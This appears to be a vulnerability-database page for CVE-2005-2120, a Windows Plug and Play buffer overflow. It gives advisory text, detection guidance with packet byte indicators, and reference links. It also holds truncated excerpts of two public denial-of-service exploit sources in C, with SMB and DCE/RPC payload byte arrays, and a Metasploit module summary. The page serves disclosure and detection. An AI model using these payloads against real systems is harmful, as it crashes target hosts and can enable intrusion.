CVE-2005-2120
published 2005-10-13CVE-2005-2120: Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local…
PriorityP353medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
63.06%
99.1th percentile
Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8
bytes↗
05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 b8 10 b8 10 00 00 00 00 01 00 00 00 00 00 01 00 40 4e 9f 8d 3d a0 ce 11 8f 69 08 00 3e 30 05 1b 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
bytes↗
05 00 00 03 10 00 00 00 30 08 00 00 01 00 00 00 18 08 00 00 00 00 0a 00 44 f7 12 00 00 04 00 00 00 00 00 00 00 04 00 00 48 00 54 00 52 00 45 00 45 00 5c 00 52 00 4f 00 4f 00 54 00 5c 00
bytes↗
\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0
bytes↗
\x00\x00\x08\x84\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8
- →Detect DCE/RPC bind requests targeting the PnP service UUID (404e9f8d-3da0-ce11-8f69-08003e30051b) over SMB named pipe \PIPE\browser, especially from unauthenticated or anonymous sessions on Windows 2000 targets. ↗
- →Alert on oversized DCE/RPC PNP_GetDeviceList requests (opnum 0x0a) over SMB — the exploit sends a ~2KB+ request body filled with repeated 0x5c 0x00 (backslash) wide-char sequences as the device filter string. ↗
- →Monitor for services.exe crashes or unexpected restarts on Windows 2000/XP systems, which is the direct observable impact of successful exploitation. ↗
- →Code execution may be possible if attacker-controlled memory is placed at addresses 0x00000030, 0x0030005C, or 0x005C005C — these are the exploit's target dereference addresses and can be used as memory forensic indicators. ↗
- ·The exploit targets Windows 2000 SP4 and earlier without authentication; Windows XP SP1 and earlier may also be affected but exploitation behavior may differ. ↗
- ·CVE-2005-2120 is distinct from CVE-2005-3644 and CVE-2006-6296, which are related but separate vulnerabilities in the same PNP_GetDeviceList code path; ensure detection rules are scoped correctly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c4pq-7f26-f57v: Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR
ghsa_unreviewed·2022-05-01
CVE-2005-2120 [MEDIUM] GHSA-c4pq-7f26-f57v: Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR
Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call.
GHSA
GHSA-h3rx-xhvf-jfqc: PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote atta
ghsa_unreviewed·2022-05-01·CVSS 6.5
CVE-2005-3644 [MEDIUM] GHSA-h3rx-xhvf-jfqc: PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote atta
PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120.
No detection rules found.
Exploit-DB
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)
exploitdb·2005-10-24
CVE-2005-2120 Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)
---
// tested and approved /str0ke
/* Program: Denial of Service attack for MS UMPNPMGR PNP_GetDeviceList
* Author: Winny Thomas
* Vulnerability: no length checking on passed parameter to PNP_GetDeviceList in UMPNPMGR.dll
* Note: The code crashes services.exe on the target, effectively bringing down the target against which its run.
* This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes
* The author shall bear no responsibility for any damage caused by using this code.
*/
#include
#include //added /str0ke (we don't want errors)
#include //added /str0ke (memcpy loves me)
#include
#include
#include
#include
char SMB_Negotiate[] =
"\x00\x00\x00\x85\
Exploit-DB
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)
exploitdb·2005-10-21
CVE-2005-2120 Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)
Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)
---
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] =
{
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
unsigned char szRequestString[] =
{
0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x
Metasploit
Microsoft Plug and Play Service Registry Overflow
metasploit
Microsoft Plug and Play Service Registry Overflow
Microsoft Plug and Play Service Registry Overflow
This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C.
No writeups or analysis indexed.
http://secunia.com/advisories/17166http://secunia.com/advisories/17172http://secunia.com/advisories/17223http://securityreason.com/securityalert/71http://securitytracker.com/id?1015042http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdfhttp://www.eeye.com/html/research/advisories/AD20051011c.htmlhttp://www.kb.cert.org/vuls/id/214572http://www.osvdb.org/18830http://www.securityfocus.com/bid/15065http://www.us-cert.gov/cas/techalerts/TA05-284A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-047https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1244https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1328https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1519http://secunia.com/advisories/17166http://secunia.com/advisories/17172http://secunia.com/advisories/17223http://securityreason.com/securityalert/71http://securitytracker.com/id?1015042http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdfhttp://www.eeye.com/html/research/advisories/AD20051011c.htmlhttp://www.kb.cert.org/vuls/id/214572http://www.osvdb.org/18830http://www.securityfocus.com/bid/15065http://www.us-cert.gov/cas/techalerts/TA05-284A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-047https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1244https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1328https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1519
2005-10-13
Published